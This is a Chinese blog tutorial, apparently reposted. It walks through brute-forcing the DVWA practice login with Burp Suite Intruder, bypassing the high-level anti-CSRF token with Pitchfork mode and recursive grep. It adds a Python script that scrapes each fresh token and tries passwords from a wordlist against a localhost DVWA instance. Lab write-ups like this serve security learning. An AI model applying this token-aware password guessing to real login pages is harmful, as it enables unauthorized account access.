标签:爆破 python brupsuite 密码 token user print input requrl
使用brupsuite和python进行密码爆破
蛮水的一篇文。。。
使用burpsuite工具进行dvwa暴力破解实验
low
首先设好浏览器代理,然后配置burpsuite监听参数
这样的配置会有一个问题,就是burpsuit无法抓住127.0.0.1的包,删掉不使用代理中的网址即可
随意输入密码,抓包
右键send to intruder,只保留密码内容作为爆破变量
构造payload
intruder->start attack
找到密码
medium
同上
high
- 将模式设为Pitchfork
- options设置
- 将线程改为单线程
选择refech response,选定token部分,确定
将该设置设为always
- 设置payloads
第一个参数设置与之前一样
第二个参数将类型设为Recursive grep,选定之前匹配的token,并在下方文本框输入第一次得到的token值
找到密码
使用python密码爆破high
from bs4 import BeautifulSoup
import urllib.request
header={ 'Host': '127.0.0.1:8088',
'Cache-Control': 'no-cache, must-revalidate',
'If-None-Match': "307-52156c6a290c0",
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Accept': '*/*',
'Referer': 'http://localhost:8088/DVWA/vulnerabilities/brute/index.php',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cookie': 'security=high; PHPSESSID=tgvioof5dbdpg9mtcckpvp1fek'}
requrl = "http://localhost:8088/DVWA/vulnerabilities/brute"
def get_token(requrl,header):
req = urllib.request.Request(url=requrl,headers=header)
response = urllib.request.urlopen(req)
print (response.getcode())
the_page = response.read()
print (len(the_page))
soup = BeautifulSoup(the_page,"html.parser")
# print '###################'
# print soup.find_all('input')[3].get('value')
user_token = soup.find_all('input')[3].get('value')
#user_token = soup.form.input.input.input.input["value"]
return user_token
user_token = get_token(requrl,header)
i=0
//逐条读取密码进行爆破
for line in open('C:/Users/Administrator/Desktop/password.txt'):
print(line.strip())
requrl = "http://127.0.0.1:8088/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
i= i+1
print (i,'admin',line.strip())
user_token = get_token(requrl,header)
if (i == 10):
break
标签:爆破,python,brupsuite,密码,token,user,print,input,requrl 来源: https://blog.csdn.net/shannow_123/article/details/89190726
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。